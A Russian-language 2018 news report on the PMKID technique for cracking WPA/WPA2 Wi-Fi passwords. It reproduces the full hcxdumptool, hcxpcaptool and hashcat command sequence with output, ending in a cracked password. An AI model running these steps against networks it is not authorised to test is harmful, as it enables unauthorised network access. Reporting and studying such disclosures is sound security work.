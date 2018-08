Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat, представил новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети. Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля. Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю. Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU. Для проведения атаки требуются свежие версии hcxdumptool, hcxtools и hashcat. Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status start capturing (stop with ctrl+c) INTERFACE:...............: wlp39s0f3u4u5 FILTERLIST...............: 0 entries MAC CLIENT...............: 89acf0e761f4 (client) MAC ACCESS POINT.........: 4604ba734d4e (start NIC) EAPOL TIMEOUT............: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER............: 62083 .... [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID] В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут. Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat. ./hcxpcaptool -z test.16800 test.pcapng start reading from test.pcapng summary: -------- file name....................: test.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.17.11-arch1 file application information.: hcxdumptool 4.2.0 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 66 skipped packets..............: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 17 probe requests...............: 1 probe responses..............: 11 association requests.........: 5 association responses........: 5 authentications (OPEN SYSTEM): 13 authentications (BROADCOM)...: 1 EAPOL packets................: 14 EAPOL PMKIDs.................: 1 1 PMKID(s) written to test.16800 Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID. Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике: ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng Запускаем hashcat для подбора пароля (применяется режим 16800): ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' hashcat (v4.2.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt * Brute-Force * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Temperature abort trigger set to 90c 2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat! Session..........: hashcat Status...........: Cracked Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs) Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs) Guess.Mask.......: ?l?l?l?l?l?lt! [8] Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#2.....: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#3.....: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#4.....: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#*.....: 1641.3 kH/s Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 66846720/308915776 (21.64%) Rejected.........: 0/66846720 (0.00%) Restore.Point....: 0/11881376 (0.00%) Candidates.#1....: hariert! -> hhzkzet! Candidates.#2....: hdtivst! -> hzxkbnt! Candidates.#3....: gnxpwet! -> gwqivst! Candidates.#4....: gxhcddt! -> grjmrut! HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1 HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1 HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1 HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1